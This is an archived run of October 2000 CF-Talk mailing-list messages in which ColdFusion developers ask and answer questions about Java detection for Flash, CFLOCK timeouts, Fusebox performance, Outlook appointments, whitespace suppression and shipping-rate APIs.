Symptoms:
The problem I'm having can best be explained with the following link and
a couple of steps:
1. View http://www.trifolium.com/ with Netscape
2. Everything including the Flash file at the top should be working fine
3. In Netscape go to Preferences, Advanced, Uncheck "Enable JAVA"
4. View page, Now it should continuously show the loading screen.

Cause:
Much like this site I am using in the body tag and onload function that
= play (). The play () function is defined in the Javascript. This code
looks like this:


function go() 

{
var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1
var header = InternetExplorer ? window.movie : window.document.movie
  header.Play()
}

In the first frame of the flash file I have set a stop () command so
that soon as the user hits the page it holds the playing of the movie
until everything is loaded which then triggers off the onload function
in the body tag which in turn executes the go () function in javascript
which sends a play () command to Flash.

Again the problem's core issue is that JAVA needs to be enabled for
these steps to work. Else it will not since the message is never sent to
Flash or Received by Flash, take your pick I'm not sure.

Possible Solution:
The possible solution to this problem is since Cold Fusion code will
always execute before Javascript will there must be a way of using Cold
Fusion to detect if the End Users browser has the setting "Enable JAVA"
turned on. If that is possible then I could easily point the End User to
a Flash file that has the "stop ()" function in the first frame or a
Flash file that just begins playing after a few frames have past etc.

I know you guys at Figleaf are pretty good at merging Flash and CF
figured I'd shoot this on the chattyfig mailing list since this is an
issue I'm sure someone has run into before.

Thanks,

Jack

Patricia Lee wrote:
 
 It looks like you're relying on the Browser Version to determine Java
 ability.  AS such, there are quite a few Cold Fusion Custom Tags out there
 that are pre-coded to scan the cgi.http_user_agent variable. Using Cold
 Fusion to do this task, rather than javascript, means you can pre-determine
 the Flash File quite easily... and before the page ever gets returned to the
 client's machine.
 
 I would check out the Allaire Tag Gallery www.allaire.com/taggallery and
 download one or more of these tags:
 
 1) CF_BrowserCheck (free)
 BrowserCheck gives you the information you need to dynamically
 include content depending on what browser is accessing your site. It
 translates the browser's USER_AGENT field into a set of variables that
 define the name of the browser, version, OS, and JavaScript compatability.
 
 2) CF_BrowserHawk (not free)
 BrowserHawk is the ultimate browser sniffer, recognizing visiting
 web browsers and their capabilities from your ColdFusion scripts. This
 allows you to achieve a consistent layout and level of site operation for
 all visitors to your site, regardless of their browser used! Easily detect
 disabled cookies, JavaScript, and applets. Detect user connection speed,
 screen size, Flash, Shockwave, Acrobat, MediaPlayer, RealPlayer and other
 plug-ins, WAP devices, reverse DNS, and over 70 properties in all. Available
 as a COM object or JavaBean for use with ColdFusion, ASP, JSP, servlets and
 other environments.
 
  snip 

- Original Message ---


All,

I'm trying to come up with an equivalent solution to detecting if java
is enabled on a end user's browser and if so then use a specific flash
file in the object/embed tags that are set through use of ColdFusion. So
far I have this javascript:

if (navigator.appName == 'Microsoft Internet Explorer' 
navigator.appVersionindexOf('MSIE 3'))
var java = false;
else
var java = navigator.javaEnabled();


My question is if I am using cold fusion variables to define the
parameters and settings how can i add logic to this to be able to use
say a specific flash file instead of another? (this is a specific
problem i've seen when trying to do fscommands to flash or flash to
javascript, etc.) I want to create a work around that enables me to use
one of two flash files, etc.

The problem I see is that since cold fusion will always execute before
javascript this is not possible. Has anyone tried this and if so how?

Thanks,

Jack


-- 
Jack Montealegre
Application Developer
G.Triad

Tel: (973) 428-9600  ext. 7618
Fax: (973) 428-1112
[EMAIL PROTECTED]
http://www.gtriad.com

FOR MORE INFORMATION ABOUT G.TRIAD
Visit the G.Triad Corporate Web Site http://www.gtriad.com

Archives: 

Re: cferror and exceptions

2000-10-20 Thread Steve Nelson

I think I have had that problem 

i place a cferror type="exception" in my application.cfm files and
have it email me on EVERY error that is not caught by a cfcatch
although I have noticed that for whatever reason there are a couple
errors that seem to get past.  The one that I noticed was when my DSL
connection goes down and my ODBC conneciton to the database cannot be
made and the cfapplication tag blows up.

Is this kind of what you're talking about?

Steve

Lawrence Smith wrote:
 
 Hi All
 
 We are trying to utilise one of the new CF4.5 features where you can catch
 exceptions using cferror instead of using cftry and cfcatch.
 
 However, our host is on 4.5 and it is not working - anyone else had this
 experience of know of a bug/solution?
 
 Many thanks!
 Lawrence Smith
 
 

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Detecting if java enabled for CFSET flashmoviename.swf

2000-10-20 Thread Gavin Myers



would this work?

 noscript
   meta http-equiv="refresh" content="0; URL=error_javascript.cfm"
 /noscript
script language = "javascript"

if (navigator.javaEnabled() == "0")

{

location = "error_java.cfm"


}

/script

can change it from re-locating the page to displaying something different

**shrug**

gavin
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 9:58 AM
To: CF-Talk
Subject: Re: Detecting if java enabled for CFSET flashmoviename.swf


Patricia,

Thanks for the quick response however my problem is not that I'm trying
to determine if a browser supports Java or even what type of browser is
being used. That is easy enough through cgi variables. 

Symptoms:
The problem I'm having can best be explained with the following link and
a couple of steps:
1. View http://www.trifolium.com/ with Netscape
2. Everything including the Flash file at the top should be working fine
3. In Netscape go to Preferences, Advanced, Uncheck "Enable JAVA"
4. View page, Now it should continuously show the loading screen.

Cause:
Much like this site I am using in the body tag and onload function that
= play (). The play () function is defined in the Javascript. This code
looks like this:


function go() 

{
var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1
var header = InternetExplorer ? window.movie : window.document.movie
  header.Play()
}

In the first frame of the flash file I have set a stop () command so
that soon as the user hits the page it holds the playing of the movie
until everything is loaded which then triggers off the onload function
in the body tag which in turn executes the go () function in javascript
which sends a play () command to Flash.

Again the problem's core issue is that JAVA needs to be enabled for
these steps to work. Else it will not since the message is never sent to
Flash or Received by Flash, take your pick I'm not sure.

Possible Solution:
The possible solution to this problem is since Cold Fusion code will
always execute before Javascript will there must be a way of using Cold
Fusion to detect if the End Users browser has the setting "Enable JAVA"
turned on. If that is possible then I could easily point the End User to
a Flash file that has the "stop ()" function in the first frame or a
Flash file that just begins playing after a few frames have past etc.

I know you guys at Figleaf are pretty good at merging Flash and CF
figured I'd shoot this on the chattyfig mailing list since this is an
issue I'm sure someone has run into before.

Thanks,

Jack

Patricia Lee wrote:
 
 It looks like you're relying on the Browser Version to determine Java
 ability.  AS such, there are quite a few Cold Fusion Custom Tags out there
 that are pre-coded to scan the cgi.http_user_agent variable. Using Cold
 Fusion to do this task, rather than javascript, means you can
pre-determine
 the Flash File quite easily... and before the page ever gets returned to
the
 client's machine.
 
 I would check out the Allaire Tag Gallery www.allaire.com/taggallery and
 download one or more of these tags:
 
 1) CF_BrowserCheck (free)
 BrowserCheck gives you the information you need to dynamically
 include content depending on what browser is accessing your site. It
 translates the browser's USER_AGENT field into a set of variables that
 define the name of the browser, version, OS, and JavaScript compatability.
 
 2) CF_BrowserHawk (not free)
 BrowserHawk is the ultimate browser sniffer, recognizing visiting
 web browsers and their capabilities from your ColdFusion scripts. This
 allows you to achieve a consistent layout and level of site operation for
 all visitors to your site, regardless of their browser used! Easily detect
 disabled cookies, JavaScript, and applets. Detect user connection speed,
 screen size, Flash, Shockwave, Acrobat, MediaPlayer, RealPlayer and other
 plug-ins, WAP devices, reverse DNS, and over 70 properties in all.
Available
 as a COM object or JavaBean for use with ColdFusion, ASP, JSP, servlets
and
 other environments.
 
  snip 

- Original Message ---


All,

I'm trying to come up with an equivalent solution to detecting if java
is enabled on a end user's browser and if so then use a specific flash
file in the object/embed tags that are set through use of ColdFusion. So
far I have this javascript:

if (navigator.appName == 'Microsoft Internet Explorer' 
navigator.appVersionindexOf('MSIE 3'))
var java = false;
else
var java = navigator.javaEnabled();


My question is if I am using cold fusion variables to define the
parameters and settings how can i add logic to this to be able to use
say a specific flash file instead of another? (this is a specific
problem i've seen when trying to do fscommands to flash or flash to
javascript, etc.) I want to create a work around that enables me to use
one of two flash files, etc.

The 

Using CF to add appointments to Outlook

2000-10-20 Thread Shane O'Dell

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--_=_NextPart_001_01C03AAA.5BD58F8E
Content-Type: text/plain;
charset="iso-8859-1"

I am trying to set up a system to allow users of our website to set a
callback time with one of our reps. Once they  set the date and time, I want
the appointment to be set up in the reps Outlook calendar. My question is,
can this be done in CF either by sending a meeting request through e-mail or
accessing the calendars directly?

Shane O'Dell
Web Developer
Stoneage.com

--_=_NextPart_001_01C03AAA.5BD58F8E
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"
HTML
HEAD
META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Diso-8859-1"
META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.5.2650.12"
TITLEUsing CF to add appointments to Outlook/TITLE
/HEAD
BODY

PFONT SIZE=3D2I am trying to set up a system to allow users of our =
website to set a callback time with one of our reps. Once theynbsp; =
set the date and time, I want the appointment to be set up in the reps =
Outlook calendar. My question is, can this be done in CF either by =
sending a meeting request through e-mail or accessing the calendars =
directly?/FONT/P

PFONT SIZE=3D2Shane O'Dell/FONT
BRFONT SIZE=3D2Web Developer/FONT
BRFONT SIZE=3D2Stoneage.com/FONT
/P

/BODY
/HTML
--_=_NextPart_001_01C03AAA.5BD58F8E--

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



CFLOCK HELLLLPPPP

2000-10-20 Thread Carol Bluestein

Hi all.   Sorry about another cflock question, but using it has stopped our
system cold.

Our system: CF v4.1 on NT integrating with ESRI ArcIMS and using SYBASE IQ12 on
UNIX for our datawarehouse.  In ArcIMS, the screen is divided into frames and
and the CF comes on in one of the frames.  I put a CFLOCK around a set of
session variables.  See code below.  Then I have an SQL statement using the
session.variables and put a CFLOCK around this too.  Now, I have to say that it
takes forever to get a query back (2 or more minutes) but I have no control over
the IQ server and once I added the CFLOCK it came back with "Timed out while
waiting to obtain exclusive lock." and stopped everything cold.To get it
working again, we have to reboot our CF server.  If we put a THROWTIMEOUT= "No" 
it will continue to process but we need those session variables for the query
that follows.

If I am to use CFLOCK how can I do it without locking our whole system?

Any Help would be very much appreciated.

Carol


CFLOCK NAME="#session.sessionID#" TYPE="EXCLUSIVE" TIMEOUT="30"
CFPARAM NAME="session.sample" DEFAULT="1"
CFIF form.sample gt ''
cfset session.sample = val(form.sample)
/CFIF

CFPARAM NAME="session.data_type" DEFAULT="S"
CFIF form.data_type gt ''
cfset session.data_type = form.data_type
/CFIF

CFPARAM NAME="session.operator" DEFAULT=""
CFIF form.operator gt ''
cfset session.operator = form.operator
/CFIF

!--- adding if to set session variable  CW 10/18/00---
CFPARAM NAME="session.field" DEFAULT=""
CFIF form.operator gt ''
cfset session.field = form.field
/CFIF
/CFLOCK


Carol L. Bluestein
Senior Programmer
NYS Office of Real Property
518-486-6335
[EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: fusebox style: too much disk access?

2000-10-20 Thread Donald Sparks

Okay, I'm not concerned with cfincludes and those related issues. I am concerned with 
the handling of multiple requests on the index or "fusebox" page (i.e.) a single page. 
For example say I have 1,000 users on my site. If they are all accessing index.cfm as 
opposed to 20 to 30 different .cfm pages. How does this affect caching and does it 
produce any other problems.

Thank you,
Don Sparks
not quite at the 32nd chamber of fusebox.

- Original Message -
From: "Steve Nelson" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Thursday, October 19, 2000 3:23 PM
Subject: Re: fusebox style: too much disk access?


 Don't be confused by what Nat is saying, a single "fuseaction" in a
 Fusebox application may only hit 5-8 files.  It's really not that big a
 deal.

 Steve

 Nat Papovich wrote:
 
  A simple test of included files suggests that CF's internal file access
  functions were pratically built with a cfinclude-heavy architecture in
mind.
  Accessing dozens of files for a single page request is very quick. Out
of
  100 included files, you might notice a 10 ms increase than if you had
all
  the code on the same page. Now that 10 ms performance hit gives you a
  scalable, intelligible architecture. If you have any experience with
really
  large sites, you know that the only safe way to scale a project is to
break
  it into small "minute modules".
 
  All this is without mentioning CF's ability to cache templates
  automatically. Accessing a file from RAM is basically instantaneous.
 
  If code scalability, readability, longevity, and understandability is
  important now or will be important later, you need to adopt a structured
  application methodology like Fusebox.
 
  Nat Papovich
  ICQ 32676414
  "I'm for truth no matter who tells it."
  -Malcolm X, 1965
 
  -Original Message-
  From: Cyrill Vatomsky [mailto:[EMAIL PROTECTED]]
  Sent: Thursday, October 19, 2000 1:00 PM
  To: CF-Talk
  Subject: fusebox style: too much disk access?
 
  I was reading on the fusebox concept of putting minute modules into
separate
  files and the question is: wouldn't that slow the site by having to
access
  too many different disk files to load one page?
 
  Cyrill
 

 


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



CF LDAP

2000-10-20 Thread Rosa, Issac

Does anyone know of a good reference dealing with CF and LDAP?  Something
that discusses overview, concepts and implementation.

If you have any questions or concerns, please feel free to call me at
407-514-5021.

Thank you,

 Issac Rosa
 
 IT - National Sales  Marketing
 OLAP Specialist Team Leader
 Ofc: 407-514-5021
 Cell: 407-342-0644
 Fax: 407-514-5988
 [EMAIL PROTECTED]
 

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Using CF to add appointments to Outlook

2000-10-20 Thread Dave Watts

 I am trying to set up a system to allow users of our website 
 to set a callback time with one of our reps. Once they set the 
 date and time, I want the appointment to be set up in the reps 
 Outlook calendar. My question is, can this be done in CF either 
 by sending a meeting request through e-mail or accessing the 
 calendars directly?

You can do this with iCalendar attachments. Read all about it in the June
2000 DC CFUG:

http://www.figleaf.com/figleafhome/cfug/cfugjune00.zip

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: fusebox style: too much disk access?

2000-10-20 Thread Dave Watts

 Okay, I'm not concerned with cfincludes and those related 
 issues. I am concerned with the handling of multiple requests 
 on the index or "fusebox" page (i.e.) a single page. For 
 example say I have 1,000 users on my site. If they are all 
 accessing index.cfm as opposed to 20 to 30 different .cfm 
 pages. How does this affect caching and does it produce any 
 other problems.

I'm not a Fusebox fan, by any measure, but it won't hurt performance at all
to access one file a thousand times, as opposed to accessing a thousand
files once each. The "native" instruction set within the file will be cached
within the CF server's memory. In any case, the other files will still be
used as needed, just from within index.cfm rather than as separate requests
from the browser.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: JavaScript Slow in IE w/Roaming Profile

2000-10-20 Thread Hays, Duncan

Thanks. This makes sense now. How surprising, MS hasn't optimized the JS
runtime! ;)

Duncan Hays
Peace Corps

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 10:36 AM
To: CF-Talk
Cc: '[EMAIL PROTECTED]'
Subject: RE: JavaScript Slow in IE w/Roaming Profile


  I did a little more checking and it seems that JS is slow on 
  all of our NTsp6 boxes whether or not they have a roaming 
  profile. What actually runs JS? NT or IE?

 IE

Actually, neither "runs" JS. When you install IE, you also install another
program, the Scripting Runtime DLL (scrrun.dll). This is what runs all
JavaScript used by any Microsoft program, whether it's IE or Windows Script
Host. The point is, the JavaScript interpreter isn't part of IE
specifically.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Selects in CFGRID

2000-10-20 Thread John Allred

I have four books open in front of me, and I've been
searching for an answer all morning. Is there a way to
insert values in a CFGRID field by selecting values from a
column from another query? What I'm looking for is the same
functionality as you'd get from an HTML SELECT field where
you populate it with a query.

Thanks,
--John

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Output to File, a lot of white space

2000-10-20 Thread Paul Sizemore

I'm writing a file to disk using the Scheduled Task's "Output to file"
feature. And, when the file is generated on disk it has a lot of extra
carriage returns, tabs, and spaces. The amount of extra "white" space looks
a lot like the extra "white" space in my code.  In fact I deleted an extra
carriage return in my Application.cfm, and a carriage return in the file was
deleted. 
I have selected  "Suppress whitespace by default " on the server, used
CFPROCESSINGDIRECTIVE ... , experimented with CFSetting, and none of them
work (I do notice a difference with suppressing the white space). 

Paul Sizemore

Finish Line
3308 N Mitthoeffer Rd
Indianapolis, IN 46235
W: 317-899-1022 ext 3516

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Working with FedEx API?

2000-10-20 Thread Jon Hall

Let me warn you now. This program does NOT like Windows 2000, and machines
with multiple IP addresses (so dont install it on any modern web server). We
have to keep the stupid program on a standalone box on the network. Fedex is
really dragging their feet on fixing this.

jon
- Original Message -
From: "Will Ryan" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Thursday, October 19, 2000 5:39 PM
Subject: Working with FedEx API?


 Hi All,

   Has any one out in never never land worked with the FedEx API?  I have
 read nearly all the documentation and have yet to find a way to reference
 the DLL in HTML or CF.  Any one have any thoughts?

 Thanks,
  Will


 --
--
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: fusebox style: too much disk access?

2000-10-20 Thread Warrick, Mark

Wouldn't that be the same concept as 1,000,000 people hitting Yahoo's homepage and 
search script every day?

I think what it comes down to is that a properly built application on a server capable 
of handling those kind of requests is not going to have any problems with the Fusebox 
methodology of coding.

---mark

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Donald Sparks [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 8:45 AM
 To: CF-Talk
 Subject: Re: fusebox style: too much disk access?
 
 
 Okay, I'm not concerned with cfincludes and those related issues. 
 I am concerned with the handling of multiple requests on the 
 index or "fusebox" page (i.e.) a single page. For example say I 
 have 1,000 users on my site. If they are all accessing index.cfm 
 as opposed to 20 to 30 different .cfm pages. How does this affect 
 caching and does it produce any other problems.
 
 Thank you,
 Don Sparks
 not quite at the 32nd chamber of fusebox.
 
 - Original Message -
 From: "Steve Nelson" [EMAIL PROTECTED]
 To: "CF-Talk" [EMAIL PROTECTED]
 Sent: Thursday, October 19, 2000 3:23 PM
 Subject: Re: fusebox style: too much disk access?
 
 
  Don't be confused by what Nat is saying, a single "fuseaction" in a
  Fusebox application may only hit 5-8 files.  It's really not that big a
  deal.
 
  Steve
 
  Nat Papovich wrote:
  
   A simple test of included files suggests that CF's internal 
 file access
   functions were pratically built with a cfinclude-heavy architecture in
 mind.
   Accessing dozens of files for a single page request is very quick. Out
 of
   100 included files, you might notice a 10 ms increase than if you had
 all
   the code on the same page. Now that 10 ms performance hit gives you a
   scalable, intelligible architecture. If you have any experience with
 really
   large sites, you know that the only safe way to scale a project is to
 break
   it into small "minute modules".
  
   All this is without mentioning CF's ability to cache templates
   automatically. Accessing a file from RAM is basically instantaneous.
  
   If code scalability, readability, longevity, and understandability is
   important now or will be important later, you need to adopt a 
 structured
   application methodology like Fusebox.
  
   Nat Papovich
   ICQ 32676414
   "I'm for truth no matter who tells it."
   -Malcolm X, 1965
  
   -Original Message-
   From: Cyrill Vatomsky [mailto:[EMAIL PROTECTED]]
   Sent: Thursday, October 19, 2000 1:00 PM
   To: CF-Talk
   Subject: fusebox style: too much disk access?
  
   I was reading on the fusebox concept of putting minute modules into
 separate
   files and the question is: wouldn't that slow the site by having to
 access
   too many different disk files to load one page?
  
   Cyrill
  
 
  
 
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



Re: fusebox style: too much disk access?

2000-10-20 Thread Steve Nelson

 I'm not a Fusebox fan, by any measure, 

Why not?  What would need to be changed to make you a fan?

Steve

but it won't hurt performance at all
 to access one file a thousand times, as opposed to accessing a thousand
 files once each. The "native" instruction set within the file will be cached
 within the CF server's memory. In any case, the other files will still be
 used as needed, just from within index.cfm rather than as separate requests
 from the browser.
 
 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/
 voice: (202) 797-5496
 fax: (202) 797-5444
 

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Output to File, a lot of white space

2000-10-20 Thread Warrick, Mark

Start all files with:
cfsetting enablecfoutputonly="yes"
put cf code here, surround HTML outputs with cfoutput

end all files with:
cfsetting enablecfoutputonly="no"

That will eliminate ALL the extra white space that was not generated as you wanted it 
to be, and it's backwards-compatible with version 4.01.

---mark

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Paul Sizemore [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 9:15 AM
 To: CF-Talk
 Subject: Output to File, a lot of white space
 
 
 I'm writing a file to disk using the Scheduled Task's "Output to file"
 feature. And, when the file is generated on disk it has a lot of extra
 carriage returns, tabs, and spaces. The amount of extra "white" 
 space looks
 a lot like the extra "white" space in my code.  In fact I deleted an extra
 carriage return in my Application.cfm, and a carriage return in 
 the file was
 deleted. 
 I have selected  "Suppress whitespace by default " on the server, used
 CFPROCESSINGDIRECTIVE ... , experimented with CFSetting, and 
 none of them
 work (I do notice a difference with suppressing the white space). 
 
 Paul Sizemore
 
 Finish Line
 3308 N Mitthoeffer Rd
 Indianapolis, IN 46235
 W: 317-899-1022 ext 3516
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Working with FedEx API?

2000-10-20 Thread Ryan

There is a web site called Intershipper that calculates shipping rates
for you for many shippers, including FedEx. They offer a CF custom tag
even. Its a free service. They do package tracking, too.
http://www.intershipper.com

Anyone used it? Any comments? I havn't yet but we plan to in our
shopping cart.

Ryan


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



CFX_PRINTREPORT Problem.

2000-10-20 Thread Nardi, Gaston

Hi,

I'm trying to use CFX_PRINTREPORT to print some Crystal Reports whitin CF,
but i'm getting "Request Cancel by the user" everytime I load the page.

I've collected very little information regarding the tag, but as far I can
see, parameters are passed correctly (printer, port, user, etc.).

Any ideas ?

If is out there another tag that would do what I want to do, please let me
know.

TIA,
Gaston.


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Working with FedEx API?

2000-10-20 Thread Bill Killillay

We have integrated both the shipping rate calc and the tracking into a site
that is not yet live and it works great.  The custom tag is written, I
believe, by Michael Sheldon at Desert Raven, it's pretty good.  Did
everything we needed it to with no problems.  It uses CFHTTP so it's kind of
slow sometime when connecting to Intershipper, but it's worth the wait.


Just my .02

Bill
cf_warrior
 -Original Message-
 From: Ryan [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 12:51 PM
 To: CF-Talk
 Subject: Re: Working with FedEx API?


 There is a web site called Intershipper that calculates shipping rates
 for you for many shippers, including FedEx. They offer a CF custom tag
 even. Its a free service. They do package tracking, too.
 http://www.intershipper.com

 Anyone used it? Any comments? I havn't yet but we plan to in our
 shopping cart.

 Ryan

 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
 or send a message with 'unsubscribe' in the body to
 [EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Editable scrolling text box

2000-10-20 Thread Rosa, Issac

Is there a way to create a scrolling input box or specify the height of the
box and wrap the text?  I have tried using cftextinput, but the text
string does not wrap.

If you have any questions or concerns, please feel free to call me at
407-514-5021.

Thank you,

 Issac Rosa
 
 IT - National Sales  Marketing
 OLAP Specialist Team Leader
 Ofc: 407-514-5021
 Cell: 407-342-0644
 Fax: 407-514-5988
 [EMAIL PROTECTED]
 

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Wierdest Access problem ever

2000-10-20 Thread Robert Everland

Alright here is what happened. I had a query that was working
perfectly for sometime. It basically did this
Select left(desc,40)
From Here
Where 1=1

What happened was the left function completely screwed the query. Has anyone
had this problem before? I thought access supported this function, was it a
fluke as to why it was working before? I took it out and put it in CF to do
it, but I am sure it would be just a little faster if Access was doing it.

Robert Everland III
Web Developer
Dixon Ticonderoga

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: fusebox style: too much disk access?

2000-10-20 Thread Dave Watts

  I'm not a Fusebox fan, by any measure, 
 
 Why not? What would need to be changed to make you a fan?

I'd have to be working on applications where the complex logic is stored in
CF, instead of in other application tiers. I don't want to fuel another "Is
Fusebox good or bad" thread, but I don't think it fits well with the type of
applications that we focus on here at Fig Leaf, which typically have lots of
client-side complexity, like frames, JavaScript, Flash, etc. and have lots
of application logic within other application tiers on the server-side, like
within stored procedures or COM/EJB.

On the other hand, if I was working on an application with all of its
complexity within CF, I'd probably like Fusebox quite a bit. Once you move
most of that complexity from CF to other tiers, though, Fusebox doesn't do
much for you, in my opinion.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Editable scrolling text box

2000-10-20 Thread Warrick, Mark

Use standard HTML: textarea cols="30" rows="5" wrap="physical"/textarea

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Rosa, Issac [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 10:02 AM
 To: CF-Talk
 Subject: Editable scrolling text box
 
 
 Is there a way to create a scrolling input box or specify the 
 height of the
 box and wrap the text?  I have tried using cftextinput, but the text
 string does not wrap.
 
 If you have any questions or concerns, please feel free to call me at
 407-514-5021.
 
 Thank you,
 
